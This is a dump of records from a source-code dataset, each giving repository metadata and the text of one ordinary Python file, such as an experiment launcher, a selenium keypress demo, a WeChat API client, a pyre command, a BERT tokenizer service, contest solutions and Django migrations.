blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
288
content_id
stringlengths
40
40
detected_licenses
listlengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
684 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
147 values
src_encoding
stringclasses
25 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
128
12.7k
extension
stringclasses
142 values
content
stringlengths
128
8.19k
authors
listlengths
1
1
author_id
stringlengths
1
132
6bbe882811dcb39c98a7a58fd9cc5cf75366df5a
7f52845b5aca331ac200565f897b2b1ba3aa79d9
/m251/exp_groups/paper/nlp/intermediate_hf/launch/launch_merge.py
cc08f799d18321b4e1506eabebbcc848c67fca1b
[]
no_license
mmatena/m251
f8fb4ba9c10cd4dfcf5ee252f80e4832e4e86aa0
e23249cf0896c5b42bcd07de70f7b9996d8b276b
refs/heads/master
2023-05-06T10:44:10.945534
2021-06-03T15:07:29
2021-06-03T15:07:29
321,217,654
0
0
null
null
null
null
UTF-8
Python
false
false
2,698
py
""" export PYTHONPATH=$PYTHONPATH:~/Desktop/projects/m251:~/Desktop/projects/del8 python3 m251/exp_groups/paper/nlp/intermediate_hf/launch/launch_merge.py """ from del8.executors.gce import gce from del8.executors.vastai import vastai from del8.executors.vastai import api_wrapper from m251.exp_groups.paper.nlp.intermediate_hf import merge # EXP = merge.Merge_BertBase_Pairs # EXP = merge.Merge_BertBaseFromMnli_Pairs # EXP = merge.Merge_BertBaseFromMnli_SquadDonor_4096 # EXP = merge.Merge_BertBase_SquadDonor_4096 # EXP = merge.Merge_BertBaseFromMnli_SquadDonor_1024 # EXP = merge.Merge_BertBase_HighResource_SquadDonor_4096 # EXP = merge.Merge_BertBase_RteHoldout_LastCkpt # EXP = merge.Merge_BertBase_RteHoldout_LastCkpt2 # EXP = merge.Merge_BertBase_RteHoldout_LastCkpt50 # EXP = merge.DummyMerge_BertBase_Pairs # EXP = merge.DummyMerge_BertBaseFromMnli_Pairs execution_items = [] EXP = merge.DummyMerge_BertBaseFromMnli_SquadDonor_4096 execution_items.extend(EXP.create_all_execution_items()) EXP = merge.DummyMerge_BertBase_SquadDonor_4096 execution_items.extend(EXP.create_all_execution_items()) EXP = merge.DummyMerge_BertBase_HighResource_SquadDonor_4096 execution_items.extend(EXP.create_all_execution_items()) # execution_items = EXP.create_all_execution_items() print(f"Number of execution items to process: {len(execution_items)}") vast_params = vastai.create_supervisor_params( EXP, execution_items=execution_items, num_workers=8, offer_query=vastai.OfferQuery( queries_str=" ".join( [ "reliability > 0.95", "num_gpus=1", "dph < 2.25", "inet_down > 100", "inet_up > 75", # "gpu_ram >= 10", # "dlperf >= 16", "cuda_vers >= 11.0 has_avx = true", ] ), order_str="dlperf_usd-", ), disk_gb=16, image="tensorflow/tensorflow:2.4.0-gpu", ) offers = api_wrapper.query_offers(vast_params) print(f"Number of acceptable offers: {len(offers)}") launch_params = gce.GceParams() node, deploy = gce.launch(execution_items, vast_params, launch_params) # # # 
############################################################################### # Stages of testing: ############################################################################### # if True: # from del8.core.execution import entrypoint # from del8.storages.gcp import gcp # gcp.PERSISTENT_CACHE = True # EXP.to_dev_mode() # execution_items = EXP.create_all_execution_items() # print(f'Number of execution items to process: {len(execution_items)}') # entrypoint.worker_run(**execution_items[0].worker_run_kwargs)
[ "michael.matena@gmail.com" ]
michael.matena@gmail.com
c56a454c10c2d14f2ef6ba96e577d2d45f93969c
e663909cec3c4eda12bb705fce9a6dc901bb7d88
/爬虫/day06 鼠标操作/code/seleniumtest_16_按键.py
4dd0d6edad17eba87b125eeab8e8ced153c844e6
[]
no_license
1284753334/learning2
a03f293965a652883503cae420d8b1ad11ae6661
f2fcb3c856656cc8427768b41add3ee083487592
refs/heads/master
2023-01-30T23:18:26.951210
2020-12-20T15:57:18
2020-12-20T15:57:18
315,065,804
2
0
null
null
null
null
UTF-8
Python
false
false
1,981
py
# _ooOoo_ # o8888888o # 88" . "88 # (| -_- |) # O\ = /O # ____/`---'\____ # .' \\| |// `. # / \\||| : |||// \ # / _||||| -:- |||||- \ # | | \\\ - /// | | # | \_| ''\---/'' | | # \ .-\__ `-` ___/-. / # ___`. .' /--.--\ `. . __ # ."" '< `.___\_<|>_/___.' >'"". # | | : `- \`.;`\ _ /`;.`/ - ` : | | # \ \ `-. \_ __\ /__ _/ .-` / / # ======`-.____`-.___\_____/___.-`____.-'====== # `=---=' # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ # 佛祖保佑 永无BUG from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains # 要想调用键盘按键操作需要引入 keys 包 from selenium.webdriver.common.keys import Keys from time import sleep driver = webdriver.Chrome() driver.implicitly_wait(10) driver.maximize_window() driver.get('http://sahitest.com/demo/keypress.htm') key_up_radio = driver.find_element_by_id('r1') # 监测按键升起 key_down_radio = driver.find_element_by_id('r2') # 监测按键按下 key_press_radio = driver.find_element_by_id('r3') # 监测按键按下升起 enter = driver.find_elements_by_xpath('//form[@name="f1"]/input')[1] # 输入框 result = driver.find_elements_by_xpath('//form[@name="f1"]/input')[0] # 监测结果 sleep(5) # 监测 key_down key_down_radio.click() ActionChains(driver).key_down(Keys.CONTROL, enter).key_up(Keys.CONTROL).perform() print(result.get_attribute('value')) sleep(5) # 监测 key_up key_up_radio.click() enter.click() ActionChains(driver).key_down(Keys.SHIFT).key_up(Keys.SHIFT).perform() print(result.get_attribute('value')) # 监测 key_press sleep(5) key_press_radio.click() enter.click() ActionChains(driver).send_keys('a').perform() print(result.get_attribute('value')) sleep(5) driver.quit()
[ "huapenghui@git.com" ]
huapenghui@git.com
bc18ab4f6f5f1d9b7afd1cc6ca0f98ab5d45e733
6490651cbbeb75e45974476dfacd9bd224e535f5
/setup.py
061e67e604b1dbdba53b9b68ae34cd227a26a0ef
[ "ZPL-2.1" ]
permissive
ajmitch/waitress
e1c5c4ffdb7ba6d3382afab70244e88ccb8cb4e2
5b73ec67e8bb99152f4113c98b586846dcb3dd55
refs/heads/master
2021-01-18T09:05:00.798542
2012-01-06T06:26:06
2012-01-06T06:26:06
3,114,643
0
0
null
null
null
null
UTF-8
Python
false
false
2,350
py
############################################################################## # # Copyright (c) 2006 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## import os from setuptools import setup, find_packages here = os.path.abspath(os.path.dirname(__file__)) try: README = open(os.path.join(here, 'README.rst')).read() CHANGES = open(os.path.join(here, 'CHANGES.txt')).read() except IOError: README = CHANGES = '' setup( name='waitress', version='0.5', author='Zope Foundation and Contributors', author_email='zope-dev@zope.org', maintainer="Chris McDonough", maintainer_email="chrism@plope.com", description='Waitress WSGI server', long_description = README +'\n\n' + CHANGES, license='ZPL 2.1', keywords='waitress wsgi server http', classifiers = [ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: Zope Public License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", 'Natural Language :: English', 'Operating System :: OS Independent', 'Topic :: Internet :: WWW/HTTP', ], url='https://github.com/Pylons/waitress', packages=find_packages(), install_requires=[ 'setuptools', ], include_package_data=True, 
test_suite='waitress', zip_safe=False, entry_points=""" [paste.server_runner] main = waitress:serve_paste """ )
[ "chrism@plope.com" ]
chrism@plope.com
d6e05b5fd8b827e3e237c651b0d26ce6266e2e74
80052e0cbfe0214e4878d28eb52009ff3054fe58
/e2yun_addons/odoo12/wx_tools/basewechat/wxclient.py
cbd74df32bc848f61bcd363947cca1dbf1e7fda9
[]
no_license
xAlphaOmega/filelib
b022c86f9035106c24ba806e6ece5ea6e14f0e3a
af4d4b079041f279a74e786c1540ea8df2d6b2ac
refs/heads/master
2021-01-26T06:40:06.218774
2020-02-26T14:25:11
2020-02-26T14:25:11
243,349,887
0
2
null
2020-02-26T19:39:32
2020-02-26T19:39:31
null
UTF-8
Python
false
false
2,795
py
# -*-coding:utf-8-*- import logging import time import requests from requests.compat import json as _json from wechatpy.constants import WeChatErrorCode from werobot.client import Client from werobot.client import check_error logger = logging.getLogger(__name__) class WxClient(Client): def request(self, method, url, **kwargs): if "params" not in kwargs: kwargs["params"] = {"access_token": self.token} if isinstance(kwargs.get("data", ""), dict): body = _json.dumps(kwargs["data"], ensure_ascii=False) body = body.encode('utf8') kwargs["data"] = body r = requests.request(method=method, url=url, **kwargs) r.raise_for_status() r.encoding = "utf-8" json = r.json() if 'errcode' in json: json['errcode'] = int(json['errcode']) if 'errcode' in json and json['errcode'] != 0: errcode = json['errcode'] errmsg = json.get('errmsg', errcode) if errcode in ( WeChatErrorCode.INVALID_CREDENTIAL.value, WeChatErrorCode.INVALID_ACCESS_TOKEN.value, WeChatErrorCode.EXPIRED_ACCESS_TOKEN.value): logger.info('Access token expired, fetch a new one and retry request') self.session.delete(self.access_token_key) self.get_access_token() access_token = self.session.get(self.access_token_key) logger.info('get new token %s' % access_token) kwargs["params"] = {"access_token": access_token} return super(WxClient, self).request(method=method, url=url, **kwargs) else: if check_error(json): return json if check_error(json): return json def get_access_token(self): """ 重写有保存token :return: 返回token """ self.token_expires_at = self.session.get(self.access_token_key_expires_at) self._token = self.session.get(self.access_token_key) if self._token and self.token_expires_at: now = time.time() if self.token_expires_at - now > 60: return self._token json = self.grant_token() self._token = json["access_token"] self.token_expires_at = int(time.time()) + json["expires_in"] self.session.set(self.access_token_key, self._token) self.session.set(self.access_token_key_expires_at, self.token_expires_at) return self._token 
@property def access_token_key(self): return '{0}_access_token'.format(self.appid) @property def access_token_key_expires_at(self): return '{0}_access_token__expires_at'.format(self.appid)
[ "hepeng1@163.com" ]
hepeng1@163.com
1729264e68e90f6adaf2e02e1f8aa993275afdc4
6b2a8dd202fdce77c971c412717e305e1caaac51
/solutions_5648941810974720_0/Python/kmwho/A.py
277ac8dd0919a4ab3da742054999cbdc87dbe0d8
[]
no_license
alexandraback/datacollection
0bc67a9ace00abbc843f4912562f3a064992e0e9
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
refs/heads/master
2021-01-24T18:27:24.417992
2017-05-23T09:23:38
2017-05-23T09:23:38
84,313,442
2
4
null
null
null
null
UTF-8
Python
false
false
882
py
#! /usr/bin/python # kmwho # CodeJam 2016 1A from __future__ import print_function import numpy as np import math def solvecase(): s = input().strip() alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" count = { c:0 for c in alpha } nums = [ "ZERO", "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE" ] digits = [] for c in s: count[c] += 1 A = np.matrix(np.zeros( (26,10) )) for r in range(26): for c in range(10): A[r,c] = nums[c].count( chr(ord("A") + r ) ) b = [ count[c] for c in alpha ] X = (A.I).dot(b) digitCount = [ int(round(d)) for d in X.flat ] digits = [] for d in range(10): for x in range(digitCount[d]): digits.append( str(d) ) return "".join(digits) def solve(): T = int(input()) for t in range(1,T+1): res = solvecase() print( "Case #" + str(t) + ": " + str(res) ) def main(): solve() main()
[ "alexandra1.back@gmail.com" ]
alexandra1.back@gmail.com
49b2cbe91dcf58a52a374da8f48ca4f24ba256a6
3649308c5d709100c4dc90e661fc9f564f184877
/ocs/student/migrations/0002_auto_20200111_1925.py
770b71e5b1126d729d0198e2d85b190c07d318af
[]
no_license
anirudhasj441/django
54171f6141d6938201146a6d3e9475477a3f0078
5bb202d13d4b17daca9aedf3b213908c3245757b
refs/heads/master
2021-07-09T06:18:11.597848
2021-03-07T17:58:32
2021-03-07T17:58:32
230,616,005
0
0
null
null
null
null
UTF-8
Python
false
false
433
py
# Generated by Django 3.0.1 on 2020-01-11 13:55 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('student', '0001_initial'), ] operations = [ migrations.AlterField( model_name='assigments', name='date', field=models.DateField(default=datetime.date(2020, 1, 11)), ), ]
[ "anirudhasj441@gmail.com" ]
anirudhasj441@gmail.com
f469a19b6eda6cb3a39531b0281881165cae515c
afaa3270ee705ba511b484c7d84377d31e3533f4
/client/commands/restart.py
583766107e2b0fa048c36da50f01fb475648a874
[ "MIT" ]
permissive
moneytech/pyre-check
b6cfe99d9c2bdb3cf3d3a33c2534e2e70d391085
dae90bee716fc1c3f2e9d9c0496e5cdd14c99701
refs/heads/master
2022-12-14T22:46:54.864244
2020-09-09T17:25:53
2020-09-09T17:27:29
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,640
py
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import argparse from typing import Optional from ..analysis_directory import AnalysisDirectory, resolve_analysis_directory from ..configuration import Configuration from .command import Command, CommandArguments, ExitCode, IncrementalStyle from .incremental import Incremental from .start import Start # noqa from .stop import Stop class Restart(Command): NAME = "restart" def __init__( self, command_arguments: CommandArguments, original_directory: str, *, configuration: Optional[Configuration] = None, analysis_directory: Optional[AnalysisDirectory] = None, terminal: bool, store_type_check_resolution: bool, use_watchman: bool, incremental_style: IncrementalStyle, ) -> None: super(Restart, self).__init__( command_arguments, original_directory, configuration, analysis_directory ) self._terminal: bool = terminal self._store_type_check_resolution: bool = store_type_check_resolution self._use_watchman: bool = use_watchman self._incremental_style: IncrementalStyle = incremental_style @staticmethod def from_arguments( arguments: argparse.Namespace, original_directory: str, configuration: Optional[Configuration] = None, analysis_directory: Optional[AnalysisDirectory] = None, ) -> "Restart": return Restart( CommandArguments.from_arguments(arguments), original_directory, configuration=configuration, analysis_directory=analysis_directory, terminal=arguments.terminal, store_type_check_resolution=arguments.store_type_check_resolution, use_watchman=not arguments.no_watchman, incremental_style=arguments.incremental_style, ) @classmethod def add_subparser(cls, parser: argparse._SubParsersAction) -> None: restart = parser.add_parser( cls.NAME, epilog="Restarts a server. Equivalent to `pyre stop && pyre`." 
) restart.set_defaults(command=cls.from_arguments) restart.add_argument( "--terminal", action="store_true", help="Run the server in the terminal." ) restart.add_argument( "--store-type-check-resolution", action="store_true", help="Store extra information for `types` queries.", ) restart.add_argument( "--no-watchman", action="store_true", help="Do not spawn a watchman client in the background.", ) restart.add_argument( "--incremental-style", type=IncrementalStyle, choices=list(IncrementalStyle), default=IncrementalStyle.FINE_GRAINED, help="How to approach doing incremental checks.", ) def generate_analysis_directory(self) -> AnalysisDirectory: return resolve_analysis_directory( self._command_arguments.source_directories, self._command_arguments.targets, self._configuration, self._original_directory, self._project_root, filter_directory=self._command_arguments.filter_directory, buck_mode=self._command_arguments.buck_mode, relative_local_root=self._configuration.relative_local_root, ) def _run(self) -> None: exit_code = ( Stop( self._command_arguments, self._original_directory, configuration=self._configuration, analysis_directory=self._analysis_directory, from_restart=True, ) .run() .exit_code() ) if exit_code != ExitCode.SUCCESS: self._exit_code = ExitCode.FAILURE return exit_code = ( Incremental( self._command_arguments, self._original_directory, configuration=self._configuration, analysis_directory=self._analysis_directory, # Force the incremental run to be blocking. nonblocking=False, incremental_style=self._incremental_style, no_start_server=False, no_watchman=not self._use_watchman, ) .run() .exit_code() ) self._exit_code = exit_code
[ "facebook-github-bot@users.noreply.github.com" ]
facebook-github-bot@users.noreply.github.com
0882dede30a8e3d97273c8afa447882ce630c447
9b50b3a7dda2711c5665909f6801249de53e70f6
/0x03-python-data_structures/3-print_reversed_list_integer.py
49d1b256e98d2d1174d1faa6a47f2f766d9695ad
[]
no_license
nikolasribeiro/holbertonschool-higher_level_programming
3119e5442887f06da104dc8aa93df371f92b9f2b
7dcdf081d8a57ea1f5f6f9830555f73bf2ae6993
refs/heads/main
2023-04-21T05:22:03.617609
2021-05-05T11:38:51
2021-05-05T11:38:51
319,198,337
0
0
null
null
null
null
UTF-8
Python
false
false
182
py
#!/usr/bin/python3 def print_reversed_list_integer(my_list=[]): if isinstance(my_list, list): for element in reversed(my_list): print("{:d}".format(element))
[ "nikolasribeiro2@outlook.com" ]
nikolasribeiro2@outlook.com
0e582df943dd67cd17d19d44d5333d5eae4c2c83
7b74696ff2ab729396cba6c203984fce5cd0ff83
/tradeaccounts/migrations/0019_auto_20200521_1511.py
cab75d17d845a2269e5dfa7899ae5acd158132b6
[ "MIT" ]
permissive
webclinic017/investtrack
e9e9a7a8caeecaceebcd79111c32b334c4e1c1d0
4aa204b608e99dfec3dd575e72b64a6002def3be
refs/heads/master
2023-06-18T12:57:32.417414
2021-07-10T14:26:53
2021-07-10T14:26:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
519
py
# Generated by Django 3.0.2 on 2020-05-21 07:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('tradeaccounts', '0018_auto_20200520_1603'), ] operations = [ migrations.AlterField( model_name='tradeaccountsnapshot', name='applied_period', field=models.CharField(blank=True, choices=[('d', '日'), ('w', '周'), ('m', '月')], default='d', max_length=1, verbose_name='收益周期'), ), ]
[ "jie.han@outlook.com" ]
jie.han@outlook.com
88342e7dee0c043519626340d3fe5daff980f706
90ca69d5d6bd9d08ee2d2b8150eb2fa6a6b00e72
/src/services/tokenize/bert_tokenize_service.py
5ba2812727be96c4859db73377c88ee44b9dcca2
[ "CC-BY-4.0" ]
permissive
budh333/UnSilence_VOC
07a4a5a58fd772230bfe1ffbcb8407de89daa210
f6ba687f96f2c23690c84590adcb24ee239aa86b
refs/heads/main
2023-05-26T20:49:49.105492
2023-05-12T23:18:50
2023-05-12T23:18:50
388,462,045
6
1
null
null
null
null
UTF-8
Python
false
false
2,829
py
import os from typing import Tuple, List from overrides import overrides from tokenizers import BertWordPieceTokenizer from tokenizers.implementations import ByteLevelBPETokenizer from tokenizers.processors import BertProcessing import sentencepiece as spm from enums.configuration import Configuration from services.arguments.pretrained_arguments_service import PretrainedArgumentsService from services.tokenize.base_tokenize_service import BaseTokenizeService from services.file_service import FileService class BERTTokenizeService(BaseTokenizeService): def __init__( self, arguments_service: PretrainedArgumentsService, file_service: FileService): super().__init__() self._arguments_service = arguments_service self._file_service = file_service pretrained_weights = self._arguments_service.pretrained_weights configuration = self._arguments_service.configuration vocabulary_path = os.path.join(self._arguments_service.data_folder, 'vocabularies', f'{pretrained_weights}-vocab.txt') if not os.path.exists(vocabulary_path): raise Exception(f'Vocabulary not found in {vocabulary_path}') self._tokenizer: BertWordPieceTokenizer = BertWordPieceTokenizer(vocabulary_path, lowercase=False) @overrides def encode_tokens(self, tokens: List[str]) -> List[int]: result = [self._tokenizer.token_to_id(x) for x in tokens] return result @overrides def decode_tokens(self, character_ids: List[int]) -> List[str]: result = [self._tokenizer.id_to_token( character_id) for character_id in character_ids] return result @overrides def decode_string(self, character_ids: List[int]) -> List[str]: result = self._tokenizer.decode(character_ids) return result @overrides def id_to_token(self, character_id: int) -> str: result = self._tokenizer.id_to_token(character_id) return result @overrides def encode_sequence(self, sequence: str) -> Tuple[List[int], List[str], List[Tuple[int,int]], List[int]]: encoded_representation = self._tokenizer.encode(sequence) return ( encoded_representation.ids, 
encoded_representation.tokens, encoded_representation.offsets, encoded_representation.special_tokens_mask) @overrides def encode_sequences(self, sequences: List[str]) -> List[Tuple[List[int], List[str], List[Tuple[int,int]], List[int]]]: encoded_representations = self._tokenizer.encode_batch(sequences) return [(x.ids, x.tokens, x.offsets, x.special_tokens_mask) for x in encoded_representations] @property @overrides def vocabulary_size(self) -> int: return self._tokenizer.get_vocab_size()
[ "kztodorov@outlook.com" ]
kztodorov@outlook.com
9d69ca141cb222bcaaadafbd4cec3717e860a907
1f73dc7507361ba35ebecd70635a797bc408414c
/py/15.py
bcee4c3f9ec5137e45e54fffd375e0e776d7c473
[]
no_license
permCoding/speedCoding-01-solutions
e8b1043209b1c431b9fdb86e2c265b48fb82ef5b
bf62b77abe9f69486412a7f595c1cf54416479b0
refs/heads/master
2020-11-27T10:44:03.555157
2019-12-23T16:01:23
2019-12-23T16:01:23
229,408,709
0
0
null
null
null
null
UTF-8
Python
false
false
187
py
n, k = map(int, input().split()) def get(N, K): if K == 0: return 1 if N == 0 else 0 if N == 0: return 0 return get(N-1, K-1) + get(N+1, K-1) print(get(n,k))
[ "ttxiom@gmail.com" ]
ttxiom@gmail.com
3df7bcb85dba0398b40efa4868900a6dedc22f36
46f44f80d63c13fcb61dacf7e08d072fb85b58dc
/MostCommonQuestions/25.removeDuplicates.py
02be555260fd9c852cab5e001f86f55ccc452660
[]
no_license
bzamith/MySDEInterviewStudies
ef6d7add97596bded460023a74ba8b77dcebf350
9eea12cc8da3f51532140ed9423ce2a8be9fbdfa
refs/heads/master
2023-02-25T11:41:28.877263
2021-02-01T10:51:48
2021-02-01T10:51:48
265,734,795
12
3
null
2020-10-05T22:21:57
2020-05-21T02:25:15
Python
UTF-8
Python
false
false
861
py
# Source: https://leetcode.com/problems/remove-duplicates-from-sorted-array/ # Problem: "Remove Duplicates from Sorted Array in Place" # Example: # Given a sorted array nums, remove the duplicates in-place such that each element appear only once and return the new length. # Do not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory. # Approach: # Two-pointers approach # Complexity: # O(N) time # O(1) space def removeDuplicates(nums): count = 0 if len(nums) < 2: return nums for i in range(1,len(nums)): if nums[i] == nums[i-1]: count += 1 else: nums[i-count] = nums[i] return nums[0:len(nums) - count] if __name__ == "__main__": print(removeDuplicates([0,0,0,1,1,2,3])) print(removeDuplicates([0,0,1,2,3,3]))
[ "noreply@github.com" ]
bzamith.noreply@github.com
aecea41605b5c7d5084faa397fb616fd19c5d700
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p04034/s271062170.py
060f9afcca29c5ceddf8d3a1e05771040ec30d15
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
532
py
n , m = map(int,input().split()) aka = [False for i in range(n+1)] kazu = [1 for i in range(n+1)] aka[1] = True for i in range(m): x , y = map(int,input().split()) if aka[x]: if kazu[x] >= 2: kazu[x] -= 1 kazu[y] += 1 elif kazu[x] == 1: kazu[x] -= 1 kazu[y] += 1 aka[x] = False aka[y] = True elif not aka[x]: kazu[x] -= 1 kazu[y] += 1 ans = 0 for i in range(1,n+1): if aka[i]: ans += 1 print(ans)
[ "66529651+Aastha2104@users.noreply.github.com" ]
66529651+Aastha2104@users.noreply.github.com
f9ccc381f1d82dbbce7caa871d0b8a5a18779e15
85e89ff0a842c74c5bae220ed694bdbc3e4eba8e
/src/sploitego/transforms/dnsptrlookup.py
b01aa10f9f0b9111301d8d6d8dcc1f87c708e41e
[]
no_license
AAG-SATIEDN/sploitego
ff368ea1e432720c0346fee1805d6b9f76b7b35f
36fa21485fbe44f14406921aa267762bb4f07bd9
refs/heads/master
2021-01-18T03:47:54.068637
2014-04-20T02:50:22
2014-04-20T02:50:22
20,336,835
2
0
null
null
null
null
UTF-8
Python
false
false
947
py
#!/usr/bin/env python from canari.maltego.configuration import BuiltInTransformSets from canari.maltego.entities import IPv4Address from canari.framework import configure from common.entities import IPv6Address from common.dnstools import nslookup __author__ = 'Nadeem Douba' __copyright__ = 'Copyright 2012, Sploitego Project' __credits__ = [] __license__ = 'GPL' __version__ = '0.2' __maintainer__ = 'Nadeem Douba' __email__ = 'ndouba@gmail.com' __status__ = 'Development' __all__ = [ 'dotransform' ] @configure( label='To DNS Name [DNS]', description='This transform will fetch the DNS records for a IP address.', uuids=[ 'sploitego.v2.IPv4AddressToDNSName_DNS', 'sploitego.v2.IPv6AddressToDNSName_DNS' ], inputs=[ ( BuiltInTransformSets.DNSFromIP, IPv4Address ), ( BuiltInTransformSets.DNSFromIP, IPv6Address ) ] ) def dotransform(request, response): nslookup(request.value, 'PTR', response) return response
[ "ndouba@gmail.com" ]
ndouba@gmail.com
1518a5d2a8c4b5414f21d19249553414d0f08678
0a63223decec3c45fdde3fffc7ca645ddcdb911c
/prev/baekjoon/8주차/12100/12100_jy.py
70d01d8463c58bc3f7b87b0ea6ce787d189305a7
[]
no_license
WebProject-STT/Algorithm
8fe1f0d4bc176784c072ae88ab154aadcdf92e85
005cfd6a803b1dbd9ede501a2133655650d0ee38
refs/heads/main
2023-07-10T02:49:36.450595
2021-08-09T12:54:13
2021-08-09T12:54:13
335,193,677
0
1
null
null
null
null
UTF-8
Python
false
false
4,598
py
# 2048(easy) import sys from collections import deque N = int(sys.stdin.readline()) max_ = -sys.maxsize grids = [list(map(int, sys.stdin.readline().split())) for _ in range(N)] def find_max(grid): global max_ for g in grid: max_ = max(max_, max(g)) return def move_up(grid): for c in range(N): stack = [] for r in range(N): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([0, grid[r][c], False]) if r: # 0번 인덱스가 아니면 grid[0][c] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: # 합쳐질 수 있으면 stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[stack[-1][0]][c] = stack[-1][1] else: grid[stack[-1][0]+1][c] = grid[r][c] if r != stack[-1][0]+1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]+1, grid[stack[-1][0]+1][c], False]) return grid def move_down(grid): for c in range(N): stack = [] for r in range(-1, -N-1, -1): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([-1, grid[r][c], False]) if r != -1: # -1번 인덱스가 아니면 grid[-1][c] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[stack[-1][0]][c] = stack[-1][1] else: grid[stack[-1][0]-1][c] = grid[r][c] if r != stack[-1][0]-1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]-1, grid[stack[-1][0]-1][c], False]) return grid def move_left(grid): for r in range(N): stack = [] for c in range(N): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([0, grid[r][c], False]) if c: # -1번 인덱스가 아니면 grid[r][0] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[r][stack[-1][0]] = stack[-1][1] else: grid[r][stack[-1][0]+1] = grid[r][c] if c != stack[-1][0]+1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]+1, grid[r][stack[-1][0]+1], False]) return grid def move_right(grid): for r in range(N): stack = [] 
for c in range(-1, -N-1, -1): if grid[r][c] and not stack: # 처음 만나는 숫자면 stack.append([-1, grid[r][c], False]) if c != -1: # -1번 인덱스가 아니면 grid[r][-1] = grid[r][c] grid[r][c] = 0 continue if grid[r][c]: if stack[-1][1] == grid[r][c] and not stack[-1][2]: stack[-1][1] = stack[-1][1]*2 stack[-1][2] = True grid[r][c] = 0 grid[r][stack[-1][0]] = stack[-1][1] else: t = grid[r][c] grid[r][stack[-1][0]-1] = grid[r][c] if c != stack[-1][0]-1: # 한칸차이 이상 grid[r][c] = 0 stack.append([stack[-1][0]-1, grid[r][stack[-1][0]-1], False]) return grid def dfs(dfs_grid, n): if n == 5: find_max(dfs_grid) return dfs(move_up([g[:] for g in dfs_grid]), n+1) dfs(move_down([g[:] for g in dfs_grid]), n+1) dfs(move_left([g[:] for g in dfs_grid]), n+1) dfs(move_right([g[:] for g in dfs_grid]), n+1) dfs(grids, 0) # print(move_up([g[:] for g in grids])) # print(move_down([g[:] for g in grids])) # print(move_left([g[:] for g in grids])) # print(move_right([g[:] for g in grids])) print(max_)
[ "vallot7@naver.com" ]
vallot7@naver.com
fa5957613e2484fe7f441729fce5a1c4086f6a4b
963a5564965e4181caa8a1c66396d714865bc236
/django_cradmin/demo/cradmin_javascript_demos/migrations/0004_fictionalfigure_is_godlike.py
a81ea3c69c3046033dc16fe8677b4d7f1287c1c8
[ "BSD-3-Clause" ]
permissive
appressoas/django_cradmin
d6694b87cf8a7e53b4b6c3049c085560eeba2c9f
944e8202ac67c3838b748ff8f3a0b2a2870619bc
refs/heads/master
2023-07-20T14:15:03.426470
2023-07-17T11:33:10
2023-07-17T11:33:10
20,762,263
12
3
BSD-3-Clause
2023-02-15T20:32:49
2014-06-12T09:45:04
JavaScript
UTF-8
Python
false
false
441
py
